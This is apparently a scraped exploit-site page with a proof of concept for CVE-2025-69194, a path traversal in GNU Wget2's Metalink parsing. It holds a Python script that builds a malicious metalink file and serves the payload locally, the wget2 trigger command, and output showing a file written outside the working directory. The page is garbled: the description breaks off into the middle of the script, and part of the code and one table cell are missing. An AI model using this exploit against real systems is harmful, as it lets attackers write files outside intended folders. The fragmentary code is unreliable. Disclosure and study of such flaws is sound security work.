## https://sploitus.com/exploit?id=81FFE1A9-5CC7-59A3-A510-1163B8BF8CB5
# CVE-2025-69194: GNU Wget2 Path Traversal Vulnerability
## 📝 Description
PoC for **CVE-2025-69194**, a critical Path Traversal vulnerability in **GNU Wget2
{file_size}
{sha256_hash}
http://127.0.0.1:{PORT}/{PAYLOAD_FILE}
'''
with open(METALINK_FILE, "w") as f:
f.write(metalink_content)
print(f"[+] 恶意文件 {METALINK_FILE} 已生成。")
def start_server():
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", PORT), handler) as httpd:
print(f"[*] 恶意服务器已在端口 {PORT} 启动...")
httpd.serve_forever()
if __name__ == "__main__":
# 清理旧文件
if os.path.exists(TARGET_FILE_NAME):
os.remove(TARGET_FILE_NAME)
create_files()
# 启动后台服务器
server_thread = threading.Thread(target=start_server, daemon=True)
server_thread.start()
time.sleep(1) # 等待服务器就绪
print("\n[!] 现在请在另一个终端执行以下命令进行复现:")
print(f"wget2 --force-metalink -i {METALINK_FILE}")
print(f"\n[!] 执行后,检查目标文件是否存在:")
print(f"ls {TARGET_FILE_NAME} && cat {TARGET_FILE_NAME}")
# 保持主线程运行
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print("\n[+] 演示结束,正在清理...")
```
### 2. Victim Side (Triggering the Exploit)
Run the following command in a sub-directory (e.g., `~/Downloads/CVE-2025-69194/`) to observe the directory escape:
```bash
# Pre-check: Verify the file does not exist in the parent's parent directory
ls ../../pwned_test.txt
# Execute the exploit
wget2 --force-metalink -i exploit.metalink
```
---
## 📊 Technical Analysis
The vulnerability exists in the Metalink parsing logic where the `name` attribute is trusted without normalization.
| Phase | Description |
| --- | --- |
| **Input** | Wget2 reads ``. |
| **Bypass** | No check is performed to see if the path contains `../` or attempts to leave the CWD. |
| **Write** | Wget2 opens the resolved path `CWD + ../../pwned_test.txt` and writes the verified payload. |
---
## 📝 Sample Output (Verified)
As demonstrated in the successful reproduction, the file `pwned_test.txt` was created two levels above the execution folder:
```text
lele@u22:~/Downloads/CVE-2025-69194$ ls ../../pwned_test.txt
ls: cannot access '../../pwned_test.txt': No such file or directory
lele@u22:~/Downloads/CVE-2025-69194$ wget2 --force-metalink -i exploit.metalink
downloading part 1/1 (0-23) ../../pwned_test.txt from 127.0.0.1
HTTP response 200 OK [http://127.0.0.1:8000/evil.dat]
part 1 downloaded
../../pwned_test.txt checking...
Checksum OK for '../../pwned_test.txt'
lele@u22:~/Downloads/CVE-2025-69194$ ls ../../pwned_test.txt && cat ../../pwned_test.txt
../../pwned_test.txt
pwned by CVE-2025-69194
```
---



## ⚠️ Disclaimer
This tool is provided for **educational and authorized security testing purposes only**. The author is not responsible for any damage caused by the misuse of this information. Unauthorized access to computer systems is strictly prohibited.